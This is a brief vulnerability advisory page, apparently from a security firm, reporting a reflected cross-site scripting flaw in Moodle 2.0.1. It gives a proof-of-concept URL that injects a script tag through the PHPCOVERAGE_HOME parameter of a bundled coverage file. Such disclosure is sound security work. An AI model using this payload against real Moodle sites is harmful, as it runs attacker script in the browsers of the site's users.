Home
Consulting
Advisories
Software
Articles
Contact

Moodle 2.0.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Moodle 2.0.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/moodle/lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php?PHPCOVERAGE_HOME=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC